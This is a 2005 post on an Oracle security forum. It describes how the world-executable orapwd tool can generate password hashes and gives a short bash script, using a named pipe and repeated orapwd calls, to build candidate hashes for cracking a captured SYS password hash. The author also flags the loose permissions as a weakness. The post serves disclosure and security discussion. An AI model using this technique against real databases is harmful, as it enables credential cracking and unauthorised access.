Auditing an Oracle database for security issues is very important. PeteFinnigan.com provides all of the information and tools that you will need Click here for details of PeteFinnigan.com Limited's detailed Oracle database security audit service Click here for details of PeteFinnigan.com Limited's Oracle Security Training Courses
Cookie Policy:We only use essential cookies on small sections of this website. For details see here.

Welcome, Guest. Please Login.
Apr 26th, 2018, 6:09pm
News: If you would like to register contact the forum admin
Home | Help | Search | Members | Login
   Pete Finnigan's Oracle Security Forum
   Oracle Security
   Oracle Security tools
(Moderator: Pete Finnigan)
   orapwd to crack sys hash?
« Previous topic | Next topic »
Pages: 1  Reply | Notify of replies | Send Topic | Print
   Author  Topic: orapwd to crack sys hash?  (Read 5746 times)
isaez
PeteFinnigan.com Junior Member
**



Ivan

   
View Profile |

Gender: male
Posts: 76
orapwd to crack sys hash?
« on: Sep 20th, 2005, 1:51pm »
Quote | Modify

Hi,
 
I've being playing with orapwd. Orapwd is 'world' executable on a standard Oracle installation. It allows to change/set the SYS password. The password is stored in $ORACLE_HOME/dbs/orapw<SID>.
But any OS user can execute it and create his own password-file. If the password-file doesn't exists its created, if it exists you get an error: OPW-00005: File with same name exists. If you use the force=y option the password-file is recreated. How can you use orapwd to crack SYS's password? Well, if you happens to have the hash value of SYS's password (very unprobable I think) you could generate all posible hashes with orapwd (although probably not as fast as orabf; I did a test with 26 password, from A to Z, and it took 0.6 seconds):
 
#!/bin/bash
 
# Auteur: I.A. Saez Scheihing
 
mknod pijp p
 
while true; do cat < pijp  >> output.txt; done &
 
orapwd file=pijp password=a force=y
orapwd file=pijp password=b force=y
orapwd file=pijp password=c force=y
orapwd file=pijp password=d force=y
orapwd file=pijp password=e force=y
orapwd file=pijp password=f force=y
orapwd file=pijp password=g force=y
orapwd file=pijp password=h force=y
orapwd file=pijp password=j force=y
orapwd file=pijp password=k force=y
orapwd file=pijp password=l force=y
orapwd file=pijp password=m force=y
orapwd file=pijp password=n force=y
orapwd file=pijp password=o force=y
orapwd file=pijp password=p force=y
...
...
..
rm pijp
 
# end script
 
So after 'password=' you could try all password combinations. After completion you would find all posible hashes in file output.txt!
 
 
By the way:
I don't think every one should be allowd to execute orapwd. This tool is meant for oracle only.
 
kind regards,
 
Ivan
IP Logged

regards,

Ivan
Pages: 1  Reply | Notify of replies | Send Topic | Print

« Previous topic | Next topic »

Powered by YaBB 1 Gold - SP 1.4!
Forum software copyright 2000-2004 Yet another Bulletin Board